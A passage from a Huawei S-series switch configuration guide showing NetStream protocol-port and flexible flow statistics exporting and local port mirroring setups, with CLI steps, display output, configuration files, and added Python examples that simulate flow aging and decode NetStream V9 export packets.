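        """Export every flow that has been idle for at least the inactive timeout."""
        expired = [k for k, r in self.flows.items() if now - r["last"] >= self.inactive_timeout]
        return [self._export(k, "inactive-timeout") for k in expired]

    def observe(self, pkt):
        """Account one packet and return any records exported as a result."""
        exported = self.age(pkt.time)
        key = (pkt.src, pkt.sport, pkt.dst, pkt.dport, pkt.proto)
        rec = self.flows.setdefault(key, {"first": pkt.time, "last": pkt.time, "packets": 0, "octets": 0})
        rec["packets"] += 1
        rec["octets"] += pkt.octets
        rec["last"] = pkt.time
        if self.tcp_flag_aging and pkt.proto == TCP and pkt.tcp_flags & (FIN | RST):
            exported.append(self._export(key, "tcp-flag"))  # connection ended: export at once
        return exported

    def _export(self, key, reason):
        rec = self.flows.pop(key)
        src, sport, dst, dport, proto = key
        return {"src": src, "sport": sport, "dst": dst, "dport": dport, "proto": proto,
                "packets": rec["packets"], "octets": rec["octets"],
                "duration": rec["last"] - rec["first"], "reason": reason}


def aggregate_protocol_port(records):
    """Summarise exported records by the protocol-port keyword (assumed here to be
    protocol number, source port and destination port), as 18.2.2 configures."""
    agg = {}
    for r in records:
        a = agg.setdefault((r["proto"], r["sport"], r["dport"]), {"flows": 0, "packets": 0, "octets": 0})
        a["flows"] += 1
        a["packets"] += r["packets"]
        a["octets"] += r["octets"]
    return agg


# Constructed traffic on GE1/0/1 (times in seconds); 203.0.113.0/24 stands in for Internet hosts.
SAMPLE_PACKETS = [
    Packet(0, "10.1.3.5", 40000, "203.0.113.10", 443, TCP, 1500, SYN),
    Packet(1, "10.1.3.5", 40000, "203.0.113.10", 443, TCP, 1500, ACK),
    Packet(2, "10.1.3.5", 40000, "203.0.113.10", 443, TCP, 500, FIN | ACK),
    Packet(5, "10.1.4.6", 40000, "203.0.113.10", 443, TCP, 1500, SYN),
    Packet(6, "10.1.4.7", 50000, "203.0.113.20", 53, UDP, 80, 0),
    Packet(7, "203.0.113.20", 53, "10.1.4.7", 50000, UDP, 200, 0),
    Packet(60, "10.1.4.6", 40000, "203.0.113.10", 443, TCP, 1000, ACK),
    Packet(160, "10.1.3.8", 40002, "203.0.113.10", 443, TCP, 1500, SYN),
]


def run_example(packets=SAMPLE_PACKETS, end_time=400):
    """Run the sample through the cache; return (original records, protocol-port aggregates)."""
    cache = FlowCache(inactive_timeout=100, tcp_flag_aging=True)
    exported = []
    for pkt in packets:
        exported.extend(cache.observe(pkt))
    exported.extend(cache.age(end_time))  # drain whatever is still idle at the end
    return exported, aggregate_protocol_port(exported)


if __name__ == "__main__":
    original, aggregated = run_example()
    for r in original:
        print(f"{r['src']}:{r['sport']} -> {r['dst']}:{r['dport']} proto {r['proto']}: "
              f"{r['packets']} pkts, {r['octets']} octets, aged by {r['reason']}")
    for (proto, sport, dport), a in aggregated.items():
        print(f"proto {proto} {sport}->{dport}: {a['flows']} flows, {a['packets']} pkts, {a['octets']} octets")
```

With the sample traffic, five original flow records collapse into four protocol-port records, and the first HTTPS flow is exported immediately on its FIN rather than 100 seconds later.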

Step 3 Configure the version of exported packets.

# Set the version of the exported packets carrying aggregation flow statistics to V9.
[SwitchA-aggregation-protport] export version 9
[SwitchA-aggregation-protport] quit

Step 4 Enable NetStream flow statistics collection on GE1/0/1.

# Enable NetStream flow statistics collection on GE1/0/1.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] ip netstream inbound
[SwitchA-GigabitEthernet1/0/1] ip netstream outbound
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] quit

Step 5 Verify the configuration.

# After the configuration is complete, the NetStream server can receive statistics packets from
SwitchA. Run the display ip netstream statistics command on SwitchA to view NetStream
flow statistics.
<SwitchA> display ip netstream statistics slot 1
===== Netstream statistics: =====
Origin/Flexible ingress entries : 95
Origin/Flexible ingress packets : 1036640
Origin/Flexible ingress octets : 340017920
Origin/Flexible egress entries : 0
Origin/Flexible egress packets : 0
Origin/Flexible egress octets : 0
Origin/Flexible total entries : 95
Handle origin entries : 95
Handle As aggre entries : 0
Handle ProtPort aggre entries : 8
Handle SrcPrefix aggre entries : 0


Handle DstPrefix aggre entries : 0
Handle Prefix aggre entries : 0
Handle AsTos aggre entries : 0
Handle ProtPortTos aggre entries : 0
Handle SrcPreTos aggre entries : 0
Handle DstPreTos aggre entries : 0
Handle PreTos aggre entries : 0

----End

Configuration Files
Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100 200 300 400
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif200
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif300
ip address 10.1.3.1 255.255.255.0
#
interface Vlanif400
ip address 10.1.4.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
ip netstream inbound
ip netstream outbound
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 200
port hybrid untagged vlan 200
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid pvid vlan 300
port hybrid untagged vlan 300
#
interface GigabitEthernet1/0/4
port link-type hybrid
port hybrid pvid vlan 400
port hybrid untagged vlan 400
#
ip netstream aggregation protocol-port
ip netstream export source 10.1.2.1
ip netstream export host 10.1.2.2 6000
enable
export version 9
#
return

18.2.3 Example for Configuring Flexible Flow Statistics Exporting


NetStream Overview
NetStream is a technology that collects statistics on and analyzes service traffic on networks.
NetStream facilitates accounting and network monitoring.
It has the following advantages:
l NetStream collects statistics on multiple types of information in packets. It provides a
powerful statistics collection function and detailed statistical results.
l NetStream can be deployed at a low cost. No dedicated device is required to collect
traffic information and no device interface is occupied.
In flexible flow statistics exporting, flows are defined by customized rules. You can
define flows based on the protocol type, DSCP priority, source IP address, destination IP
address, source port number, destination port number, or flow label as required. Flexible flow
statistics are sent to the NetStream server. Compared with original flow statistics collection,
flexible flow statistics collection generates less export traffic and is more flexible.

Configuration Notes
NetStream is supported by E series (except ET1D2X48SEC0), and X1E cards.
NetStream conflicts with IP Source Trail on modular switches, so do not configure them
simultaneously.

Table 18-3 Applicable product models and versions

Product Model       Software Version
S12704              V200R008C00, V200R009C00
S12708 and S12712   V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00

Networking Requirements
As shown in Figure 18-7, Department 1 and Department 2 connect to the Internet through
SwitchA. Network administrators want to monitor communication between the two
departments and the Internet.

Figure 18-7 Networking diagram for configuring flexible flow statistics exporting

[Figure: SwitchA connects to the Internet through GE1/0/1 (VLANIF100, 10.1.1.1/24) and to the
NetStream server (10.1.2.2/24) through GE1/0/2 (VLANIF200, 10.1.2.1/24). GE1/0/3 (VLANIF300,
10.1.3.1/24) and GE1/0/4 (VLANIF400, 10.1.4.1/24) connect Department 1 and Department 2.]

Configuration Roadmap
You can configure IPv4 flexible flow statistics exporting on GE1/0/1 of SwitchA. Configure
SwitchA to collect statistics on incoming and outgoing traffic on the interface, and to send the
statistics to the NetStream server for further analysis. In this way, you can monitor
communication between the two departments and the Internet.
The configuration roadmap is as follows:
1. Configure IP addresses for interfaces on SwitchA.
2. Configure a flexible flow statistics template.
3. Configure NetStream flexible flow statistics exporting.
4. Enable flexible flow statistics collection on GE1/0/1.

Procedure
Step 1 Configure IP addresses for interfaces on SwitchA according to Figure 18-7.
# Configure IP addresses for interfaces on SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 200 300 400
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 10.1.1.1 24
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 200
[SwitchA-Vlanif200] ip address 10.1.2.1 24
[SwitchA-Vlanif200] quit
[SwitchA] interface vlanif 300
[SwitchA-Vlanif300] ip address 10.1.3.1 24
[SwitchA-Vlanif300] quit
[SwitchA] interface vlanif 400
[SwitchA-Vlanif400] ip address 10.1.4.1 24
[SwitchA-Vlanif400] quit

[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid
[SwitchA-GigabitEthernet1/0/1] port hybrid pvid vlan 100
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 100
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type hybrid
[SwitchA-GigabitEthernet1/0/2] port hybrid pvid vlan 200
[SwitchA-GigabitEthernet1/0/2] port hybrid untagged vlan 200
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type hybrid
[SwitchA-GigabitEthernet1/0/3] port hybrid pvid vlan 300
[SwitchA-GigabitEthernet1/0/3] port hybrid untagged vlan 300
[SwitchA-GigabitEthernet1/0/3] quit
[SwitchA] interface gigabitethernet 1/0/4
[SwitchA-GigabitEthernet1/0/4] port link-type hybrid
[SwitchA-GigabitEthernet1/0/4] port hybrid pvid vlan 400
[SwitchA-GigabitEthernet1/0/4] port hybrid untagged vlan 400
[SwitchA-GigabitEthernet1/0/4] quit

Step 2 Configure a flexible flow statistics template.


# Create a flexible flow statistics template test to aggregate flows based on the destination IP
address and destination port number, and configure the exported packets to contain the
number of bytes and packets and the indexes of the inbound and outbound interfaces.
[SwitchA] ip netstream record test
[SwitchA-record-test] match ip destination-address
[SwitchA-record-test] match ip destination-port
[SwitchA-record-test] collect interface input
[SwitchA-record-test] collect interface output
[SwitchA-record-test] collect counter bytes
[SwitchA-record-test] collect counter packets
[SwitchA-record-test] quit

Step 3 Configure NetStream flexible flow statistics exporting.


# Set the source IP address of the exported packets carrying flexible flow statistics to 10.1.2.1,
destination IP address to 10.1.2.2, and destination port number to 6000.
[SwitchA] ip netstream export source 10.1.2.1
[SwitchA] ip netstream export host 10.1.2.2 6000

Step 4 Enable flexible flow statistics collection on GE1/0/1.


# Enable flexible flow statistics collection on GE1/0/1, and apply the flexible flow statistics
template test to GE1/0/1.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port ip netstream record test
[SwitchA-GigabitEthernet1/0/1] ip netstream inbound
[SwitchA-GigabitEthernet1/0/1] ip netstream outbound
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] quit

Step 5 Verify the configuration.


# After the configuration is complete, the NetStream server can receive statistics packets from
SwitchA. Run the display ip netstream statistics command on SwitchA to view NetStream
flow statistics.
<SwitchA> display ip netstream statistics slot 1
===== Netstream statistics: =====
Origin/Flexible ingress entries : 20
Origin/Flexible ingress packets : 176541
Origin/Flexible ingress octets : 123657230
Origin/Flexible egress entries : 0

Origin/Flexible egress packets : 0
Origin/Flexible egress octets : 0
Origin/Flexible total entries : 20
Handle origin entries : 0
Handle As aggre entries : 0
Handle ProtPort aggre entries : 0
Handle SrcPrefix aggre entries : 0
Handle DstPrefix aggre entries : 0
Handle Prefix aggre entries : 0
Handle AsTos aggre entries : 0
Handle ProtPortTos aggre entries : 0
Handle SrcPreTos aggre entries : 0
Handle DstPreTos aggre entries : 0
Handle PreTos aggre entries : 0
Record test handle entries : 10

----End
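The statistics exported above reach the NetStream server as template-based V9 packets, and the server has to learn the layout of record test from a template FlowSet before it can decode the data. The collector-side decoder below is an added example, not code from the Huawei document or its software; it assumes the standard V9 field type numbers for the fields that template test matches and collects, and the sample packet it builds is constructed, not captured from a switch.

```python
"""Collector-side decoder for NetStream V9 flexible flow export packets.

Added example, not part of the Huawei document or its software. It assumes the
statistics exported by the flexible flow template "test" travel in the
template-based NetStream V9 format using the standard V9 field type numbers."""
import struct

# Standard V9 field types for the keys that the template "test" matches and collects.
FIELD_NAMES = {
    1: "in_bytes",         # collect counter bytes
    2: "in_packets",       # collect counter packets
    7: "l4_dst_port",      # match ip destination-port
    10: "input_ifindex",   # collect interface input
    12: "ipv4_dst_addr",   # match ip destination-address
    14: "output_ifindex",  # collect interface output
}
# Constructed sample layout for that template: one (type, length) pair per field.
SAMPLE_TEMPLATE_ID = 256
SAMPLE_FIELDS = [(12, 4), (7, 2), (10, 4), (14, 4), (1, 4), (2, 4)]


def decode_field(ftype, raw):
    """IPv4 addresses become dotted quads; everything else a big-endian integer."""
    if ftype == 12:
        return ".".join(str(b) for b in raw)
    return int.from_bytes(raw, "big")


def parse_v9(packet, templates=None):
    """Decode one export packet and return (templates, flow records).

    templates maps (source_id, template_id) -> field layout and is meant to be
    kept across packets: a data FlowSet whose template has not arrived yet is
    skipped rather than guessed at, which is why the collector keeps the cache."""
    templates = {} if templates is None else templates
    if len(packet) < 20:
        raise ValueError("packet shorter than the 20-byte V9 header")
    version, count, uptime, secs, seq, source_id = struct.unpack("!HHIIII", packet[:20])
    if version != 9:
        raise ValueError(f"not a V9 export packet: version {version}")
    records, off = [], 20
    while off + 4 <= len(packet):
        fs_id, fs_len = struct.unpack("!HH", packet[off:off + 4])
        if fs_len < 4 or off + fs_len > len(packet):
            raise ValueError(f"malformed FlowSet length {fs_len} at offset {off}")
        body = packet[off + 4:off + fs_len]
        if fs_id == 0:  # template FlowSet, may define several templates
            p = 0
            while p + 4 <= len(body):
                tid, nfields = struct.unpack("!HH", body[p:p + 4])
                p += 4
                if nfields == 0 or p + 4 * nfields > len(body):
                    break  # padding or truncated template
                templates[(source_id, tid)] = [
                    struct.unpack("!HH", body[p + 4 * i:p + 4 * i + 4]) for i in range(nfields)]
                p += 4 * nfields
        elif fs_id >= 256:  # data FlowSet, identified by its template id
            layout = templates.get((source_id, fs_id))
            if layout is not None:
                rec_len, p = sum(flen for _, flen in layout), 0
                while rec_len and p + rec_len <= len(body):  # trailing bytes are padding
                    rec = {}
                    for ftype, flen in layout:
                        rec[FIELD_NAMES.get(ftype, f"type_{ftype}")] = decode_field(ftype, body[p:p + flen])
                        p += flen
                    records.append(rec)
        # FlowSet id 1 (options template) and other ids are skipped here
        off += fs_len
    return templates, records


def build_sample_packet(seq, with_template=True):
    """Constructed export from SwitchA (source id 1): optionally the template
    FlowSet, then a data FlowSet with two flows heading to the Internet."""
    tmpl = struct.pack("!HH", SAMPLE_TEMPLATE_ID, len(SAMPLE_FIELDS))
    tmpl += b"".join(struct.pack("!HH", t, l) for t, l in SAMPLE_FIELDS)
    tmpl_fs = struct.pack("!HH", 0, 4 + len(tmpl)) + tmpl
    flows = [  # dst address, dst port, input ifindex, output ifindex, bytes, packets
        ("203.0.113.10", 443, 3, 1, 123657, 1765),
        ("203.0.113.25", 53, 4, 1, 9040, 113),
    ]
    data = b""
    for dst, port, ifin, ifout, nbytes, npkts in flows:
        data += bytes(int(o) for o in dst.split("."))
        data += struct.pack("!HIIII", port, ifin, ifout, nbytes, npkts)
    data_fs = struct.pack("!HH", SAMPLE_TEMPLATE_ID, 4 + len(data)) + data
    header = struct.pack("!HHIIII", 9, len(flows) + with_template, 123456, 1477785600, seq, 1)
    return header + (tmpl_fs if with_template else b"") + data_fs


def bytes_per_destination(records):
    """Aggregate decoded flows the way the template keys them: per (dst address, dst port)."""
    totals = {}
    for rec in records:
        key = (rec["ipv4_dst_addr"], rec["l4_dst_port"])
        totals[key] = totals.get(key, 0) + rec["in_bytes"]
    return totals
```

A data-only packet parsed with an empty template cache yields no records, which is the expected behaviour when the collector restarts and the switch has not yet resent its template.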

Configuration Files
Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100 200 300 400
#
ip netstream export source 10.1.2.1
ip netstream export host 10.1.2.2 6000
#
ip netstream record test
match ip destination-address
match ip destination-port
collect counter packets
collect counter bytes
collect interface input
collect interface output
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif200
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif300
ip address 10.1.3.1 255.255.255.0
#
interface Vlanif400
ip address 10.1.4.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
ip netstream inbound
ip netstream outbound
port ip netstream record test
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 200
port hybrid untagged vlan 200
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid pvid vlan 300
port hybrid untagged vlan 300
#
interface GigabitEthernet1/0/4

port link-type hybrid
port hybrid pvid vlan 400
port hybrid untagged vlan 400
#
return

18.3 Typical Mirroring Configuration

18.3.1 Example for Configuring Local Port Mirroring (1:1 Mirroring)

Local Port Mirroring Overview


In local port mirroring, an observing port is directly connected to a monitoring device and
directly forwards the packets copied from a mirrored port to the monitoring device for fault
location and service monitoring.

Configuration Notes
l An observing port is dedicated to forwarding mirrored traffic. Do not configure other
services on an observing port; otherwise, mirrored traffic and other service traffic
interfere with each other.
l If the mirroring function is deployed on many ports of a device, a great deal of internal
forwarding bandwidth will be occupied, which may affect the forwarding of other
services. Additionally, if the mirrored port and observing port provide different
bandwidth, for example, 1000 Mbit/s on the mirrored port and 100 Mbit/s on the
observing port, the observing port may fail to forward all mirrored packets in a timely
manner because of insufficient bandwidth, leading to packet loss.
l On all Huawei S series modular switch models, Eth-Trunks can be configured as
observing ports.
l Both Ethernet ports and Eth-Trunks can be configured as mirrored ports. If an Eth-Trunk
is configured as a mirrored port, its member ports cannot be configured as observing
ports.
l This example applies to all models.

Networking Requirements
As shown in Figure 18-8, the administrative department of a company accesses the Internet
through the Switch, and the monitoring device Server is directly connected to the Switch.
Internet access traffic of the administrative department needs to be monitored through the
Server.

Figure 18-8 Networking of local port mirroring

[Figure: the Switch connects upstream to the Internet. GE1/0/1 (mirrored port) connects the
administrative department hosts HostA, HostB, and HostC; GE1/0/2 (local observing port)
connects the monitoring Server. Original packets arrive on the mirrored port and mirrored
packets leave on the observing port.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure GE1/0/2 of the Switch as a local observing port to forward mirrored packets to
the Server.
2. Configure GE1/0/1 of the Switch as a mirrored port to copy Internet access traffic of the
administrative department to the local observing port.

Procedure
Step 1 Configure an observing port.

# Configure GE1/0/2 of the Switch as a local observing port.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] observe-port 1 interface gigabitethernet 1/0/2 //Configure GE1/0/2 as local observing port 1.

Step 2 Configure a mirrored port.

# Configure GE1/0/1 of the Switch as a mirrored port to copy the packets received by the
mirrored port to the local observing port.

[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port-mirroring to observe-port 1 inbound //Mirror incoming packets on GE1/0/1 to observing port 1.
[Switch-GigabitEthernet1/0/1] return

Step 3 Verify the configuration.

# Check the observing port configuration.


<Switch> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface : GigabitEthernet1/0/2
----------------------------------------------------------------------

# Check the mirrored port configuration.


<Switch> display port-mirroring
----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/2
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
Mirror-port Direction Observe-port
----------------------------------------------------------------------
1 GigabitEthernet1/0/1 Inbound Observe-port 1
----------------------------------------------------------------------

----End

Configuration Files
l Configuration file of the Switch
#
sysname Switch
#
observe-port 1 interface GigabitEthernet1/0/2
#
interface GigabitEthernet1/0/1
port-mirroring to observe-port 1 inbound
#
return

Related Content
Support Community
Mirroring – an Effective Network Monitoring Tool (Working Mechanism and Configuration)
Mirroring – an Effective Network Monitoring Tool (Specifications)
Videos
How to Configure Port Mirroring

18.3.2 Example for Configuring Local Port Mirroring (1:N Mirroring in Which Observing Ports Are Configured One by One)

1:N Mirroring Overview


In 1:N mirroring, packets on one mirrored port are copied to N observing ports so that the
packets can be copied to different monitoring devices for analysis and processing.

In 1:N mirroring, multiple observing ports need to be configured and connected to different
monitoring devices. Observing ports can be configured one by one or in a batch. The single
and batch configuration modes can be used simultaneously. Observing ports configured in a
batch can be bound to the same mirrored port to simplify the configuration of 1:N mirroring.
Therefore, batch configuration is recommended in 1:N mirroring.

Configuration Notes
l An observing port is dedicated to forwarding mirrored traffic. Do not configure other
services on an observing port; otherwise, mirrored traffic and other service traffic
interfere with each other.
l If the mirroring function is deployed on many ports of a device, a great deal of internal
forwarding bandwidth will be occupied, which may affect the forwarding of other
services. Additionally, if the mirrored port and observing port provide different
bandwidth, for example, 1000 Mbit/s on the mirrored port and 100 Mbit/s on the
observing port, the observing port may fail to forward all mirrored packets in a timely
manner because of insufficient bandwidth, leading to packet loss.
l On all Huawei S series modular switch models, Eth-Trunks can be configured as
observing ports.
l Both Ethernet ports and Eth-Trunks can be configured as mirrored ports. If an Eth-Trunk
is configured as a mirrored port, its member ports cannot be configured as observing
ports.
l The following table lists the applicable products and versions of this configuration
example.

Table 18-4 Applicable product models and versions

Product Model        Software Version
S12704               V200R008C00 and V200R009C00
                     X1E series cards do not support 1:N mirroring in which observing ports are
                     configured one by one; other cards support 1:N mirroring in the inbound and
                     outbound directions.
S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, and V200R009C00
                     X1E series cards do not support 1:N mirroring in which observing ports are
                     configured one by one; other cards support 1:N mirroring in the inbound and
                     outbound directions.

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 18-9, the R&D department of a company accesses the Internet through
the Switch, and monitoring devices Server1, Server2, and Server3 are directly connected to
the Switch.
Internet access traffic of the R&D department needs to be mirrored to different servers for
different monitoring and analysis purposes.

Figure 18-9 Local port mirroring networking

[Figure: the Switch connects upstream to the Internet. GE1/0/1 (mirrored port) connects the
R&D department hosts HostA, HostB, and HostC; GE1/0/2, GE1/0/3, and GE1/0/4 (local observing
ports) connect Server1, Server2, and Server3. Original packets arrive on the mirrored port and
mirrored packets leave on the observing ports.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure GE1/0/2 through GE1/0/4 of the Switch as local observing ports to forward
mirrored packets to different servers.
2. Configure GE1/0/1 of the Switch as a mirrored port to copy the traffic passing through it
to different local observing ports.

Procedure
Step 1 Configure observing ports.
# Configure GE1/0/2 through GE1/0/4 of the Switch as local observing ports one by one.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] observe-port 1 interface gigabitethernet 1/0/2 //Configure GE1/0/2 as a local observing port with the index 1.
[Switch] observe-port 2 interface gigabitethernet 1/0/3 //Configure GE1/0/3 as a local observing port with the index 2.
[Switch] observe-port 3 interface gigabitethernet 1/0/4 //Configure GE1/0/4 as a local observing port with the index 3.

Step 2 Configure a mirrored port.


# Configure GE1/0/1 of the Switch as a mirrored port to copy the packets received by the
mirrored port to local observing ports.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port-mirroring to observe-port 1 inbound //Mirror incoming traffic on GE1/0/1 to observing port 1.
[Switch-GigabitEthernet1/0/1] port-mirroring to observe-port 2 inbound //Mirror incoming traffic on GE1/0/1 to observing port 2.
[Switch-GigabitEthernet1/0/1] port-mirroring to observe-port 3 inbound //Mirror incoming traffic on GE1/0/1 to observing port 3.
[Switch-GigabitEthernet1/0/1] return

Step 3 Verify the configuration.


# Check the observing port configuration.
<Switch> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface : GigabitEthernet1/0/2
----------------------------------------------------------------------
Index : 2
Untag-packet : No
Interface : GigabitEthernet1/0/3
----------------------------------------------------------------------
Index : 3
Untag-packet : No
Interface : GigabitEthernet1/0/4
----------------------------------------------------------------------

# Check the mirrored port configuration.


<Switch> display port-mirroring
----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/2
Observe-port 2 : GigabitEthernet1/0/3
Observe-port 3 : GigabitEthernet1/0/4
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
Mirror-port Direction Observe-port
----------------------------------------------------------------------
1 GigabitEthernet1/0/1 Inbound Observe-port 1
2 GigabitEthernet1/0/1 Inbound Observe-port 2
3 GigabitEthernet1/0/1 Inbound Observe-port 3
----------------------------------------------------------------------

----End

Configuration Files
l Configuration file of the Switch
#
sysname Switch
#
observe-port 1 interface GigabitEthernet1/0/2
observe-port 2 interface GigabitEthernet1/0/3
observe-port 3 interface GigabitEthernet1/0/4
#
interface GigabitEthernet1/0/1
port-mirroring to observe-port 1 inbound
port-mirroring to observe-port 2 inbound
port-mirroring to observe-port 3 inbound
#
return

Related Content
Support Community
Mirroring – an Effective Network Monitoring Tool (Working Mechanism and Configuration)
Mirroring – an Effective Network Monitoring Tool (Specifications)
Videos
How to Configure Port Mirroring

18.3.3 Example for Configuring Local Port Mirroring (1:N Mirroring in Which Observing Ports Are Configured in a Batch)

1:N Mirroring Overview


In 1:N mirroring, packets on one mirrored port are copied to N observing ports so that the
packets can be copied to different monitoring devices for analysis and processing.

In 1:N mirroring, multiple observing ports need to be configured and connected to different
monitoring devices. Observing ports can be configured one by one or in a batch. The single
and batch configuration modes can be used simultaneously. Observing ports configured in a
batch can be bound to the same mirrored port to simplify the configuration of 1:N mirroring.
Therefore, batch configuration is recommended in 1:N mirroring.

Configuration Notes
l An observing port is dedicated to forwarding mirrored traffic. Do not configure other
services on an observing port; otherwise, mirrored traffic and other service traffic
interfere with each other.
l If the mirroring function is deployed on many ports of a device, a great deal of internal
forwarding bandwidth will be occupied, which may affect the forwarding of other
services. Additionally, if the mirrored port and observing port provide different
bandwidth, for example, 1000 Mbit/s on the mirrored port and 100 Mbit/s on the
observing port, the observing port may fail to forward all mirrored packets in a timely
manner because of insufficient bandwidth, leading to packet loss.
l On all Huawei S series modular switch models, Eth-Trunks can be configured as
observing ports.
l Both Ethernet ports and Eth-Trunks can be configured as mirrored ports. If an Eth-Trunk
is configured as a mirrored port, its member ports cannot be configured as observing
ports.
l In 1:N mirroring, if you batch configure either inbound or outbound packets to be copied
from a mirrored port to multiple observing ports, the packets cannot be copied to other
observing ports.
l The following table lists the applicable products and versions of this configuration
example.

Table 18-5 Applicable product models and versions

Product Model        Software Version
S12704               V200R008C00 and V200R009C00
S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, and V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 18-10, the R&D department of a company accesses the Internet through
the Switch, and monitoring devices Server1, Server2, and Server3 are directly connected to
the Switch.

Internet access traffic of the R&D department needs to be mirrored to different servers for
different monitoring and analysis purposes.

Figure 18-10 Local port mirroring networking

[Figure: the Switch connects upstream to the Internet. GE1/0/1 (mirrored port) connects the
R&D department hosts HostA, HostB, and HostC; GE1/0/2, GE1/0/3, and GE1/0/4 (local observing
ports) connect Server1, Server2, and Server3. Original packets arrive on the mirrored port and
mirrored packets leave on the observing ports.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure GE1/0/2 through GE1/0/4 of the Switch as local observing ports to forward
mirrored packets to different servers.

2. Configure GE1/0/1 of the Switch as a mirrored port to copy the traffic passing through it
to different local observing ports.

Procedure
Step 1 Configure observing ports.

# Configure GE1/0/2 through GE1/0/4 of the Switch as local observing ports in a batch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] observe-port 1 interface-range gigabitethernet 1/0/2 to gigabitethernet 1/0/4 //Configure GE1/0/2 through GE1/0/4 as local observing ports in a batch; they share observing port 1.

Step 2 Configure a mirrored port.

# Configure GE1/0/1 of the Switch as a mirrored port to copy the packets received by the
mirrored port to local observing ports.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port-mirroring to observe-port 1 inbound //Mirror incoming traffic on GE1/0/1 to observing port 1.
[Switch-GigabitEthernet1/0/1] return

Step 3 Verify the configuration.

# Check the observing port configuration.


<Switch> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface-range: GigabitEthernet1/0/2 to GigabitEthernet1/0/4
----------------------------------------------------------------------

# Check the mirrored port configuration.


<Switch> display port-mirroring
----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/2 to GigabitEthernet1/0/4
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
Mirror-port Direction Observe-port
----------------------------------------------------------------------
1 GigabitEthernet1/0/1 Inbound Observe-port 1
----------------------------------------------------------------------

----End

Configuration Files
l Configuration file of the Switch
#
sysname Switch
#
observe-port 1 interface-range GigabitEthernet1/0/2 to GigabitEthernet1/0/4
#
interface GigabitEthernet1/0/1
port-mirroring to observe-port 1 inbound
#
return

Related Content
Support Community
Mirroring – an Effective Network Monitoring Tool (Working Mechanism and
Configuration)
Mirroring – an Effective Network Monitoring Tool (Specifications)
Videos
How to Configure Port Mirroring

18.3.4 Example for Configuring Local Port Mirroring (N:1 Mirroring)

N:1 Mirroring Overview


In N:1 mirroring, packets on N mirrored ports are copied to one observing port so that packets
on different ports can be copied to the same monitoring device for analysis.

Configuration Notes
l An observing port is dedicated to forwarding mirrored traffic. Do not configure other
services on an observing port; otherwise, mirrored traffic and other service traffic
interfere with each other.
l If the mirroring function is deployed on many ports of a device, a great deal of internal
forwarding bandwidth will be occupied, which may affect the forwarding of other
services. Additionally, if the mirrored port and observing port provide different
bandwidth, for example, 1000 Mbit/s on the mirrored port and 100 Mbit/s on the
observing port, the observing port may fail to forward all mirrored packets in a timely
manner because of insufficient bandwidth, leading to packet loss.
l On all Huawei S series modular switch models, Eth-Trunks can be configured as
observing ports.
l Both Ethernet ports and Eth-Trunks can be configured as mirrored ports. If an Eth-Trunk
is configured as a mirrored port, its member ports cannot be configured as observing
ports.
l This example applies to all models.

Networking Requirements
As shown in Figure 18-11, three departments (science and technology department 1, science
and technology department 2, and administrative department) of a company access the
Internet through the Switch, and the monitoring device Server is directly connected to the
Switch.
Internet access traffic of the three departments needs to be monitored through the Server.

Figure 18-11 Local port mirroring networking

[Figure: the Switch connects upstream to the Internet. GE1/0/1, GE1/0/2, and GE1/0/3 (mirrored
ports) connect Science and Technology department 1, Science and Technology department 2, and
